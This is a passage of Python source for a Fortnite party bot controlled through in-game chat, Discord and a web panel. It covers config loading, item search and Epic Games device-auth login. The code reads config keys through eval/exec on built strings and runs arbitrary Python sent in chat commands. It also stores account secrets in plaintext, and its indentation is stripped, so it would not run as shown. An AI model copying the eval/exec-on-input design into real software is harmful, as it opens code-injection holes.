elif True in [text.lower() in commands[key] for key in toy_keys] or text.lower().startswith("toy_"):
return "toy_id"
elif True in [text.lower() in commands[key] for key in item_keys]:
return "id"
def convert_to_old_type(text: str) -> Optional[str]:
converter = {
"outfit": "outfit",
"back bling": "backpack",
"pet": "pet",
"harvesting tool": "pickaxe",
"emote": "emote",
"emoticon":" emoji",
"toy": "toy",
"item": "item"
}
return converter.get(text.lower())
def convert_to_new_type(text: str) -> Optional[str]:
converter = {
"outfit": "Outfit",
"backpack": "Back Bling",
"pet": "Pet",
"pickaxe": "Harvesting Tool",
"emote": "Emote",
"emoji": "Emoticon",
"toy": "Toy",
"item": "Item"
}
return converter.get(text.lower())
def convert_backend_type(backendType: str) -> str:
converter = {
"AthenaBackpack": "Back Bling",
"AthenaPickaxe": "Harvesting Tool",
"AthenaItemWrap": "Wrap",
"AthenaGlider": "Glider",
"AthenaCharacter": "Outfit",
"AthenaPet": "Pet",
"AthenaMusicPack": "Music",
"AthenaLoadingScreen": "Loading Screen",
"AthenaDance": "Emote",
"AthenaSpray": "Spray",
"AthenaEmoji": "Emoticon",
"AthenaSkyDiveContrail": "Contrail",
"AthenaPetCarrier": "Pet",
"AthenaToy": "Toy",
"AthenaConsumableEmote": "Emote",
"AthenaBattleBus": "Battle Bus",
"AthenaRewardEventGraphCosmetic": "Outfit",
"AthenaVictoryPose": "Emote"
}
return converter.get(backendType)
def convert_variant(type_: str, variants: dict) -> List[dict]:
result = []
for variant in variants:
for option in variant['options']:
result.append(
{
"name": option['name'],
'variants': [
{
'c': variant['channel'],
'v': option['tag'],
'dE': 0
}
]
}
)
return result
def get_device_auth_details() -> None:
if os.path.isfile(filename):
with open(filename, 'r') as f:
return json.load(f)
return {}
def store_device_auth_details(email: str, details: dict) -> None:
existing = get_device_auth_details()
existing[email.lower()] = details
with open(filename, 'w') as f:
json.dump(existing, f)
def load_json(filename: str) -> Union[list,dict]:
try:
with open(filename,encoding='utf-8') as f:
data = json.load(f)
except (json.decoder.JSONDecodeError, UnicodeDecodeError):
try:
with open(filename,encoding='utf-8-sig') as f:
data = json.load(f)
except (json.decoder.JSONDecodeError, UnicodeDecodeError):
with open(filename,encoding='shift_jis') as f:
data = json.load(f)
return data
def load_config(client: Optional[fortnitepy.Client] = None) -> bool:
global data
global commands
global replies
try:
data = load_json("config.json")
except json.decoder.JSONDecodeError as e:
send('ボット',f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send('ボット','config.json ファイルの読み込みに失敗しました。正しく書き込めているか確認してください',red,add_d=lambda x:f'>>> {x}')
send('Bot','Failed to load config.json file. Make sure you wrote correctly',red,add_d=lambda x:f'>>> {x}')
return False
except FileNotFoundError:
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send('ボット','config.json ファイルが存在しません',red,add_d=lambda x:f'>>> {x}')
send('Bot','config.json file does not exist',red,add_d=lambda x:f'>>> {x}')
return False
if data.get('loglevel','normal') == 'debug':
send('ボット',f'\n{json.dumps(data,ensure_ascii=False,indent=4)}\n',yellow,add_d=lambda x:f'\n```{x}```\n')
for key,tags in config_tags_raw.items():
try:
value = eval(f"data{key}")
except KeyError:
error_config.append(key)
else:
if isinstance(value,dict):
continue
if bool_ in tags:
if not isinstance(value,bool):
error_config.append(key)
elif bool_none in tags:
if not isinstance(value,(bool,None.__class__)):
error_config.append(key)
elif "can_be_multiple" in tags:
if not isinstance(value,list):
if str in tags:
error_config.append(key)
try:
exec(f"data{key} = value.split(',')")
except Exception:
if data.get('loglevel','normal') == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif int in tags:
error_config.append(key)
try:
exec(f"data{key} = [value]")
except Exception:
if data.get('loglevel','normal') == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
if not isinstance(value,tags[0]):
error_config.append(key)
try:
exec(f"data{key} = tags[0](value)")
except Exception:
if data.get('loglevel','normal') == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
checks = [
['fortnite','owner'],
['fortnite','blacklist'],
['fortnite','whitelist'],
['fortnite','invitelist'],
['fortnite','otherbotlist'],
['discord','owner'],
['discord','blacklist'],
['discord','whitelist']
]
for check in checks:
k,k2 = check
try:
for value in data.get(k,{}).get(k2,[]).copy():
if len(str(value)) == 0:
data.get(k,{}).get(k2,[]).remove(value)
except Exception:
if data.get('loglevel','normal') == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
with open("config.json", 'w', encoding='utf-8') as f:
json.dump(data, f, ensure_ascii=False, indent=4)
def set_default(keys: list, default: Any, func: Optional[Callable] = None) -> None:
text = ""
text2 = ""
for nest,key in enumerate(keys,1):
text += f"['{key}']"
if nest == len(keys):
if isinstance(default,str):
text2 += f".get('''{key}''','''{default}''')"
else:
text2 += f".get('''{key}''',{default})"
else:
text2 += f"['''{key}''']"
if func:
var = func(eval(f"data{text2}"))
exec(f"data{text} = var")
else:
exec(f"data{text} = data{text2}")
set_default(['fortnite'],{})
set_default(['fortnite','outfit'],"")
set_default(['fortnite','outfit_style'],"")
set_default(['fortnite','backpack'],"")
set_default(['fortnite','backpack_style'],"")
set_default(['fortnite','pickaxe'],"")
set_default(['fortnite','pickaxe_style'],"")
set_default(['fortnite','emote'],"")
try:
set_default(['fortnite','privacy'],'public',lambda x: getattr(PartyPrivacy,x.upper()))
except AttributeError:
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
error_config.append("['fortnite']['privacy']")
set_default(['fortnite','avatar_color'],'#ffffff,#ffffff,#ffffff')
set_default(['discord','channels'],['{name}-command-channel'],lambda x: [i.replace(" ","-").replace(".","-").replace(",","-").replace("--","-").lower() for i in x])
try:
set_default(['discord','status_type'],'playing',lambda x: getattr(discord.ActivityType,x.lower()))
except AttributeError:
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
error_config.append("['discord']['status_type']")
set_default(['web'],{})
set_default(['web','ip'],'{ip}')
set_default(['web','port'],8080)
set_default(['web','login_required'],False)
set_default(['lang'],'en')
set_default(['caseinsensitive'],False)
set_default(['no-logs'],False)
set_default(['discord-log'],False)
set_default(['search_max'],60)
set_default(['omit-over2000'],False)
set_default(['skip-if-overflow'],False)
set_default(['hide-email'],False)
set_default(['hide-token'],False)
set_default(['hide-webhook'],False)
set_default(['loglevel'],'normal')
if data.get("status",1) == 0:
config_tags["['fortnite']['email']"].append("red")
config_tags["['lang']"].append("red")
if os.getcwd().startswith('/app') or os.getcwd().startswith('/home/runner'):
data['web']['ip']="0.0.0.0"
else:
data['web']['ip'] = data['web']['ip'].format(ip=socket.gethostbyname(socket.gethostname()))
if client:
client.status_ = data['fortnite']['status']
client.whisper = data['fortnite']['whisper']
client.partychat = data['fortnite']['partychat']
client.discord = data['discord']['discord']
client.web = data['web']['web']
client.whisperperfect = data['fortnite']['disablewhisperperfectly']
client.partychatperfect = data['fortnite']['disablepartychatperfectly']
client.discordperfect = data['discord']['disablediscordperfectly']
client.joinmessageenable = data['fortnite']['joinmessageenable']
client.randommessageenable = data['fortnite']['randommessageenable']
client.outfitmimic = data['fortnite']['outfitmimic']
client.backpackmimic = data['fortnite']['backpackmimic']
client.pickaxemimic = data['fortnite']['pickaxemimic']
client.emotemimic = data['fortnite']['emotemimic']
client.outfitlock = data['fortnite']['outfitlock']
client.backpacklock = data['fortnite']['backpacklock']
client.pickaxelock = data['fortnite']['pickaxelock']
client.emotelock = data['fortnite']['emotelock']
client.acceptinvite = data['fortnite']['acceptinvite']
client.acceptfriend = data['fortnite']['acceptfriend']
if error_config:
send('ボット',f'config.json ファイルの読み込みに失敗しました。キーの名前が間違っていないか確認してください。アップデート後の場合は、最新のconfig.jsonファイルを確認してください\n{", ".join(error_config)} がありません',red,add_d=lambda x:f'>>> {x}')
send('Bot',f'Failed to load config.json file. Make sure key name is correct. If this after update, plase check latest config.json file\n{", ".join(error_config)} is missing',red,add_d=lambda x:f'>>> {x}')
os.makedirs("items/", exist_ok=True)
def load_lang(lang: str) -> None:
global localize
try:
localize = load_json(f"lang/{lang}.json")
except json.decoder.JSONDecodeError as e:
send('ボット',f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send('ボット',f'{data["lang"]}.json ファイルの読み込みに失敗しました。正しく書き込めているか確認してください\n',red,add_d=lambda x:f'>>> {x}')
send('Bot',f'Failed to load {data["lang"]}.json file. Make sure you wrote correctly',red,add_d=lambda x:f'>>> {x}')
return False
except FileNotFoundError:
send('ボット',f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send('ボット',f'{data["lang"]}.json ファイルが存在しません',red,add_d=lambda x:f'>>> {x}')
send('Bot',f'{data["lang"]}.json file does not exist',red,add_d=lambda x:f'>>> {x}')
return False
return True
if os.path.isfile(f"lang/{data['lang']}.json"):
if not load_lang(data['lang']):
return False
else:
if not load_lang("en"):
return False
color = data['fortnite']['avatar_color'].split(',') if data['fortnite']['avatar_color'] else ""
if len(color) > 2:
background_colors = [color[0], color[1], color[2]]
elif len(color) == 1:
try:
background_colors = eval(f"fortnitepy.KairosBackgroundColorPreset.{color[0]}")
except (AttributeError, SyntaxError):
send(l('bot'),l('color_must_be'))
error_config.append("['fortnite']['avatar_color']")
background_colors = ["#ffffff","#ffffff","#ffffff"]
else:
background_colors = None
data['fortnite']['avatar_color'] = background_colors
try:
commands = load_json("commands.json")
except json.decoder.JSONDecodeError as e:
send(l('bot'),f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send(l('bot'),l("load_failed_json", "commands.json"),red,add_d=lambda x:f'>>> {x}')
return False
except FileNotFoundError:
send(l('bot'),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l('bot'),l("load_failed_notfound", "commands.json"),red,add_d=lambda x:f'>>> {x}')
return False
if data['loglevel'] == 'debug':
send(l('bot'),f'\n{json.dumps(commands,ensure_ascii=False,indent=4)}\n',yellow,add_d=lambda x:f'\n```{x}```\n')
for key,tags in commands_tags.items():
try:
value = eval(f"commands{key}")
except KeyError:
error_commands.append(key)
else:
if not isinstance(value,list):
try:
exec(f"commands{key} = value.split(',')")
except Exception:
if data["loglevel"] == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
error_commands.append(key)
with open("commands.json", 'w', encoding='utf-8') as f:
json.dump(commands, f, ensure_ascii=False, indent=4)
def set_default_(key: str, default: Any, func: Optional[Callable] = None) -> None:
text = f"['{key}']"
text2 = f".get('{key}','{default}')"
if func:
exec(f"commands{text} = {func}(commands{text2})")
else:
exec(f"commands{text} = commands{text2}")
set_default_("usercommands","")
if error_commands:
send(l('bot'),f'{l("load_failed_keyerror", "commands.json")}\n{l("is_missing", ", ".join(error_commands))}',red,add_d=lambda x:f'>>> {x}')
if data['caseinsensitive']:
commands = {k.lower(): [jaconv.kata2hira(c.lower()) for c in v] for k,v in commands.items()}
flag = True
commands['ownercommands'] = []
if "{all}" in commands['usercommands']:
for command in (list(commands_tags.keys()) + ["cid_","bid_","petcarrier_","pickaxe_id_","eid_","emoji_","toy_","item-search"]):
command = command.replace("['","",1).replace("']","",1)
if command in ["usercommands","true","false","me","privacy_public","privacy_friends_allow_friends_of_friends","privacy_friends","privacy_private_allow_friends_of_friends","privacy_private","info_party"]:
continue
if command in [i.lower() for i in commands['usercommands']]:
commands['ownercommands'].append(command)
else:
for command in (list(commands_tags.keys()) + ["cid_","bid_","petcarrier_","pickaxe_id_","eid_","emoji_","toy_","item-search"]):
command = command.replace("['","",1).replace("']","",1)
if command in ["usercommands","true","false","me","privacy_public","privacy_friends_allow_friends_of_friends","privacy_friends","privacy_private_allow_friends_of_friends","privacy_private","info_party"]:
continue
if command not in [i.lower() for i in commands['usercommands']]:
commands['ownercommands'].append(command)
try:
replies = load_json("replies.json")
except json.decoder.JSONDecodeError as e:
send(l('bot'),f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send(l('bot'),l("load_failed_json", "replies.json"),red,add_d=lambda x:f'>>> {x}')
return False
except FileNotFoundError:
send(l('bot'),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l('bot'),l("load_failed_notfound", "replies.json"),red,add_d=lambda x:f'>>> {x}')
return False
return True
def get_item_data(lang: str) -> dict:
res = requests.get("https://benbotfn.tk/api/v1/cosmetics/br", params={"lang": lang})
if res.status_code == 200:
return res.json()
return None
def store_item_data(langs: list) -> None:
with ThreadPoolExecutor() as executor:
futures = {executor.submit(get_item_data,lang): lang for lang in langs}
for future in as_completed(futures):
lang = futures[future]
result = future.result()
data_ = {}
if data["loglevel"] == "debug":
send(l("bot"),f"Saving {lang} items",yellow)
for item in result:
type_ = convert_backend_type(item["backendType"])
if type_ in ignoretype:
continue
if not data_.get(type_):
data_[type_] = []
data_[type_].append(item)
for type_,items in data_.items():
with open(f"items/{type_}_{lang}.json","w",encoding="utf-8") as f:
json.dump(items,f,ensure_ascii=False,indent=4)
if data["loglevel"] == "debug":
send(l("bot"),f"Saved {lang} items",yellow)
def partymember_backpack(member: fortnitepy.party.PartyMemberBase) -> str:
asset = member.meta.backpack
result = re.search(r".*\.([^\'\"]*)", asset.strip("'"))
if result and result.group(1) != 'None':
return result.group(1)
def partymember_emote(member: fortnitepy.party.PartyMemberBase) -> str:
asset = member.meta.emote
result = re.search(r".*\.([^\'\"]*)", asset.strip("'"))
if result and result.group(1) != 'None':
return result.group(1)
def member_asset(member: fortnitepy.party.PartyMemberBase, asset: str) -> str:
if asset in ("backpack", "pet"):
return partymember_backpack(member)
elif asset in ("emote", "emoji", "toy"):
return partymember_emote(member)
else:
return getattr(member, asset, None)
def search_item(lang: str, mode: str, text: str, type_: Optional[str] = None, cache: Optional[bool] = True) -> Optional[List[dict]]:
itemlist = []
if not cache_items.get(lang):
cache_items[lang] = []
if cache:
if mode == 'set':
data_ = cache_items[lang]
else:
data_ = [i for i in cache_items[lang] if convert_backend_type(i["backendType"]) in type_.split(',')]
else:
data_ = []
if type_ not in ["Item", None]:
with ThreadPoolExecutor() as executor:
def _open_file(filename: str) -> Union[list, dict]:
with open(filename, 'r', encoding='utf-8') as f:
d = json.load(f)
return d
futures = [executor.submit(_open_file,f'items/{i}_{lang}.json') for i in type_.split(',')]
for future in futures:
data_.extend(future.result())
else:
with ThreadPoolExecutor() as executor:
def _open_file(filename: str) -> Union[list, dict]:
with open(filename, 'r', encoding='utf-8') as f:
d = json.load(f)
return d
def _(text: str) -> str:
return re.sub(r"items(\\|/)","",text).replace(f"_{lang}.json","")
futures = [executor.submit(_open_file,f'items/{_(i)}_{lang}.json') for i in glob(f"items/*_{lang}.json") if _(i)[0].isupper()]
for future in futures:
data_.extend(future.result())
for item in data_:
try:
if convert_backend_type(item["backendType"]) in ignoretype or item in itemlist or item.get("name") is None:
continue
if mode == "name":
if data['caseinsensitive']:
text_ = jaconv.hira2kata(text.lower())
name = jaconv.hira2kata(item['name'].lower())
else:
text_ = text
name = item['name']
if text_ in name:
itemlist.append(item)
elif mode == "id":
text_ = text
if text_.lower() in item['id'].lower():
itemlist.append(item)
elif mode == "set":
if not item.get('set'):
continue
if data['caseinsensitive']:
text_ = jaconv.hira2kata(text.lower())
name = jaconv.hira2kata(item['set'].lower())
else:
text_ = text
name = item['set']
if text_ in name:
itemlist.append(item)
except Exception:
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l("bot"),item,red,add_d=lambda x:f'>>> {x}')
if len(itemlist) == 0:
if cache:
return search_item(lang=lang, mode=mode, text=text, type_=type_, cache=False)
else:
return None
else:
if not cache:
for item in itemlist:
if item not in cache_items[lang]:
cache_items[lang].append(item)
return itemlist
def search_style(lang: str, id_: str, type_: str, cache: Optional[bool] = True) -> Optional[List[dict]]:
if not cache_items.get(lang):
cache_items[lang] = []
if cache:
data_ = cache_items[lang]
else:
data_ = []
if type_ != "Item":
with ThreadPoolExecutor() as executor:
futures = [executor.submit(load_json,f'items/{i}_{lang}.json') for i in type_.split(',')]
for future in futures:
data_.extend(future.result())
else:
with ThreadPoolExecutor() as executor:
def _(text: str) -> str:
return re.sub(r"items(\\|/)","",text).replace(f"_{lang}.json","")
futures = [executor.submit(load_json,f'items/{_(i)}_{lang}.json') for i in glob(f"items/*_{lang}.json") if _(i)[0].isupper()]
for future in futures:
data_.extend(future.result())
variants = None
for item in data_:
if item['id'].lower() == id_.lower():
if item['variants']:
variants = convert_variant(item['backendType'], item['variants'])
break
if not variants:
if cache:
return search_style(lang=lang, id_=id_, type_=type_, cache=False)
else:
return None
else:
if not cache:
if item not in cache_items[lang]:
cache_items[lang].append(item)
return variants
def get_banner_data() -> dict:
res = requests.get("https://benbotfn.tk/api/v1/exportAsset?path=FortniteGame/Content/Banners/BannerIcons")
if res.status_code == 200:
return res.json()
return None
def store_banner_data() -> None:
data = get_banner_data()
with open("items/banners.json","w",encoding="utf-8") as f:
json.dump(data,f,indent=4,ensure_ascii=False)
def search_banner(id_: str) -> Optional[dict]:
data_ = load_json("items/banners.json")
data_ = {k.lower():v for k,v in data_.items()}
return data_.get(id_.lower())
def restart(sleep_time: Optional[Union[int,float]] = 0) -> None:
if sleep_time > 0:
time.sleep(sleep_time)
os.chdir(os.getcwd())
os.execv(os.sys.executable,['python', *sys.argv])
if True: #Asynchronous functions
async def reply(message: Union[fortnitepy.message.MessageBase, discord.Message, WebMessage], client: fortnitepy.Client, content: str) -> None:
if isinstance(message, fortnitepy.message.MessageBase):
await message.reply(content)
elif isinstance(message, discord.Message):
if len(content) > 1990:
text = discord.utils.escape_markdown(content).split("\n")
for txt in text:
if len(txt) > 1990:
text = [txt[i:i+1990] for i in range(0, len(txt), 1990)]
for t in text:
await message.channel.send(t)
else:
await message.channel.send(content)
else:
await message.channel.send(content)
elif isinstance(message, WebMessage):
message.reply(content)
elif isinstance(message, AllMessage):
message.reply(content, client)
async def aexec(code: str, variable: dict) -> Any:
def _(text) -> str:
return re.match(r"(\u0020|\u3000)*", text).end() * u"\u0020"
scode = code.split('\n')
delete = len(_(scode[0]))
lines = [i.replace(u"\u0020", "", delete) for i in scode]
exc = (
f'async def __ex(var):'
+ '\n for v in var:'
+ '\n v = var[v]'
+ ''.join(f'\n {l}' for l in lines)
+ '\n for v in locals():'
+ '\n var[v] = locals()[v]'
)
if data['loglevel'] == 'debug':
send(l('bot'),exc,yellow,add_d=lambda x:f'```\n{x}\n```')
exec(exc)
variable_before = variable.copy()
result = await locals()['__ex'](variable)
variable_after = variable.copy()
newvar = {k: v for k,v in variable_after.items() if (k not in variable_before.keys() or v != variable_before.get(k)) and "_" not in k and k not in ("k", "v") and isinstance(k, str)}
for k in newvar:
exc = (
f"global {k}"
+ f"\n{k} = newvar['{k}']"
)
exec(exc)
return result
async def generate_device_auth_and_store(email: str) -> str:
global web_text
while True:
send(l('bot'),l('get_code', email))
web_text = l('get_code2', email)
response = await ainput("Data: \n")
if "redirectUrl" in response:
response = json.loads(response)
if "?code" not in response["redirectUrl"]:
send(l('bot'),l('unauthorized'))
continue
code = response["redirectUrl"].split("?code=")[1]
else:
if "https://accounts.epicgames.com/fnauth" in response:
if "?code" not in response:
send(l('bot'),l('unauthorized'))
continue
code = response.split("?code=")[1]
else:
code = response
data = await authorization_code_auth(code)
try:
access_token = data["access_token"]
in_app_id = data["in_app_id"]
except KeyError:
send(l('bot'),l('authorization_expired'))
continue
fortnite_access_token, fortnite_expires_at = await get_fortnite_token(access_token)
user = await lookup_user(in_app_id, fortnite_access_token)
if user["email"].lower() == email.lower():
break
else:
send(l('bot'),l('account_incorrect', user["email"], email))
continue
exchange_code = await exchange(access_token)
launcher_access_token, client_id = await exchange_code_auth(exchange_code)
details = await generate_device_auth(client_id, launcher_access_token)
store_device_auth_details(email.lower(), details)
web_text = ""
return details
async def get_token() -> tuple:
async with aiohttp.ClientSession() as session:
data = await session.post(
oauth_url,
headers={
"Authorization": f"basic {launcher_token}"
},
data={
"grant_type": "client_credentials",
"token_type": "eg1"
}
)
data = await data.json()
return data["access_token"], datetime.datetime.fromisoformat(data["expires_at"].replace("Z",""))
async def get_fortnite_token(access_token: str) -> tuple:
exchange_code = await exchange(access_token)
async with aiohttp.ClientSession() as session:
data = await session.post(
fortnite_token_url,
headers={
"Authorization": f"basic {fortnite_token}"
},
data={
"grant_type": "exchange_code",
"token_type": "eg1",
"exchange_code": exchange_code
}
)
data = await data.json()
return data["access_token"], datetime.datetime.fromisoformat(data["expires_at"].replace("Z",""))
async def authorization_code_auth(authorization_code: str) -> Optional[tuple]:
async with aiohttp.ClientSession() as session:
data = await session.post(
oauth_url,
headers={
"Authorization": f"basic {launcher_token}"
},
data={
"grant_type": "authorization_code",
"code": authorization_code,
"token_type": "eg1"
}
)
return await data.json()
async def exchange_code_auth(exchange_code: str) -> tuple:
async with aiohttp.ClientSession() as session:
data = await session.post(
exchange_auth_url,
headers={
"Authorization": f"basic {launcher_token}"
},
data={
"grant_type": "exchange_code",
"exchange_code": exchange_code,
"token_type": "eg1"
}
)
data = await data.json()
return data["access_token"], data["account_id"]
async def exchange(access_token: str) -> str:
async with aiohttp.ClientSession() as session:
data = await session.get(
exchange_url,
headers={
"Authorization": f"bearer {access_token}"
}
)
data = await data.json()
return data["code"]
async def lookup_user(user_id: str, fortnite_access_token: str) -> dict:
async with aiohttp.ClientSession() as session:
data = await session.get(
user_lookup_url.format(user_id=user_id),
headers={
"Authorization": f"bearer {fortnite_access_token}"
}
)
data = await data.json()
return data
async def generate_device_auth(client_id: str, access_token: str) -> dict:
async with aiohttp.ClientSession() as session:
data = await session.post(
f"https://account-public-service-prod.ol.epicgames.com/account/api/public/account/{client_id}/deviceAuth",
headers={
"Authorization": f"Bearer {access_token}",
"Content-Type": "application/json"
}
)
data = await data.json()
return {"device_id": data["deviceId"], "account_id": data["accountId"], "secret": data["secret"]}
async def run_bot() -> None:
for client in clients:
client.booting = True
if data.get('restart_in') not in [None, 0]:
Timer(data.get('restart_in'), restart).start()
try:
await fortnitepy.start_multiple(
clients,
all_ready_callback=lambda: send(l("bot"),l("all_login"),green,add_p=lambda x:f'[{now()}] {x}') if len(clients) > 1 else print('')
)
except fortnitepy.AuthException as e:
if data["loglevel"] == "debug":
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if "errors.com.epicgames.account.oauth.exchange_code_not_found" in e.args[0]:
send(l("bot"),l("exchange_code_error"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
elif "Invalid device auth details passed." in e.args[0]:
some_detail = e.args[0].split("-")[0].strip()
device_auth_details = get_device_auth_details()
for email,details in device_auth_details.items():
for detail in details.values():
if detail == some_detail:
break
else:
continue
break
else:
email = some_detail
device_auth_details.pop(email.lower())
with open(filename, 'w') as f:
json.dump(device_auth_details, f)
restart()
else:
send(l("bot"),l("login_failed"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
sys.exit(1)
except fortnitepy.HTTPException as e:
if data["loglevel"] == "debug":
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if "reset" in e.args[0]:
send(l("bot"),l("password_reset_error"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
else:
send(l("bot"),l("login_failed"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
sys.exit(1)
except KeyboardInterrupt:
sys.exit(1)
except Exception:
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l("bot"),l("failed_to_load_account"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
sys.exit(1)
async def run_app() -> None:
try:
await app.create_server(host=data['web']['ip'], port=data['web']['port'], return_asyncio_server=True, access_log=data['web']['log'])
except OSError:
if data["loglevel"] == "debug":
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l("bot"),l("web_already_running"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
if data["status"] == 0 or bot_ready is False:
webbrowser.open(f"http://{data['web']['ip']}:{data['web']['port']}")
send(l("bot"),l("web_running",f"http://{data['web']['ip']}:{data['web']['port']}"),add_p=lambda x:f'[{now()}] {x}')
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
async def process_command(message: Union[fortnitepy.FriendMessage, fortnitepy.PartyMessage, discord.Message, WebMessage, AllMessage]):
global blacklist
global whitelist
global blacklist_
global whitelist_
global otherbotlist
if not message or not message.content:
return
loop = asyncio.get_event_loop()
content = message.content
con = content.split("\n")
if data['caseinsensitive']:
args = jaconv.kata2hira(content.lower()).split()
else:
args = content.split()
content_ = ' '.join(args[1:])
content2_ = ' '.join(args[2:])
rawargs = content.split()
rawcontent = ' '.join(rawargs[1:])
rawcontent2 = ' '.join(rawargs[2:])
check_ownercommand = True
check_ng = True
if len(args) < 1:
return
if isinstance(message, fortnitepy.message.MessageBase):
client = message.client
client.add_cache(message.author)
if "Lupus" in content:
if isinstance(message, fortnitepy.PartyMessage):
await message.author.block()
await message.author.kick()
if ((data['discord']['enabled'] and not dclient.isready)
or (message.author.id in blacklist and data['fortnite']['blacklist-ignorecommand'])
or (message.author.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['ignorebot'])):
return
if ((len(con) > 1)
and not (args[0] in commands['eval'])
and not (args[0] in commands['exec'])):
tasks = []
for c in con:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
tasks.append([task,mes])
await asyncio.gather(*[task[0] for task in tasks])
for mes in [task[1] for task in tasks]:
result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
if isinstance(message, fortnitepy.FriendMessage):
if not client.whisper:
if client.whisperperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist:
return
if data['loglevel'] == 'normal':
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
else:
send(f'{name(message.author)} [{platform_to_str(message.author.platform)}]',content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} [{platform_to_str(message.author.platform)}] | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
elif isinstance(message, fortnitepy.PartyMessage):
if not client.partychat:
if client.partychatperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist:
return
display_name_ = client.is_most()
if display_name_:
if data['loglevel'] == 'normal':
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {name(message.author)} | {x}',add_d=lambda x:f'[{l("party")}] [{display_name_}] {x}')
else:
send(f'{name(message.author)} [{platform_to_str(message.author.platform)}/{message.author.input}]',content,add_p=lambda x:f'[{now()}] [{l("party")}/{client.party.id}] [{display_name_}] {name(message.author)} [{platform_to_str(message.author.platform)}/{message.author.input}] | {x}',add_d=lambda x:f'[{l("party")}/{client.party.id}] [{display_name_}] {x}')
if content_ in commands['me']:
rawcontent = message.author.id
content_ = message.author.id
if ((message.author.id in [owner.id for owner in client.owner])
or (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])):
check_ownercommand = False
if ((message.author.id in [owner.id for owner in client.owner])
or (message.author.id in whitelist and data['fortnite']['whitelist-ignoreng'])):
check_ng = False
elif isinstance(message, discord.Message):
if ((not isinstance(message.channel, discord.TextChannel))
or (message.author.id == dclient.user.id)
or (message.author.id in blacklist_ and data['discord']['blacklist-ignorecommand'])
or (message.author.bot and data['discord']['ignorebot'])):
return
if True in [True for i in data['discord']['channels'] if "{name}" not in i and "{id}" not in i and message.channel.name == i]:
tasks = {}
for client_ in loadedclients:
mes = AllMessage(content, message.author, client_, message)
task = loop.create_task(process_command(mes))
tasks[client_] = [task, mes]
await asyncio.gather(*[i[0] for i in tasks.values()])
for client_,list_ in tasks.items():
result = list_[1].result.get(client_.user.id)
if result:
results = '\n'.join(result)
await reply(message, client_, f"[{name(client_.user)}] {results}")
return
else:
for clientname, client in client_name.items():
if not client.isready:
continue
if message.channel.name in [i.format(name=clientname, id=client.user.id).replace(" ","-").replace(".","-").replace(",","-").replace("--","-").lower() for i in data["discord"]["channels"]]:
break
else:
return
if not client.discord:
if client.discordperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist_:
return
if (len(con) > 1
and not (args[0] in commands['eval'])
and not (args[0] in commands['exec'])):
tasks = []
for c in con:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
tasks.append([task,mes])
await asyncio.gather(*[task[0] for task in tasks])
for mes in [task[1] for task in tasks]:
result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}({dclient.user})] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}({dclient.user})] {x}')
if ((message.author.id in [owner.id for owner in dclient.owner])
or (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
check_ownercommand = False
if ((message.author.id in [owner.id for owner in dclient.owner])
or (message.author.id in whitelist_ and data['discord']['whitelist-ignoreng'])):
check_ng = False
elif isinstance(message, WebMessage):
client = message.client
if ((data['discord']['enabled'] and not dclient.isready)
or (not client.web)):
return
if (len(con) > 1
and not (args[0] in commands['eval'])
and not (args[0] in commands['exec'])):
tasks = []
for c in con:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
tasks.append([task,mes])
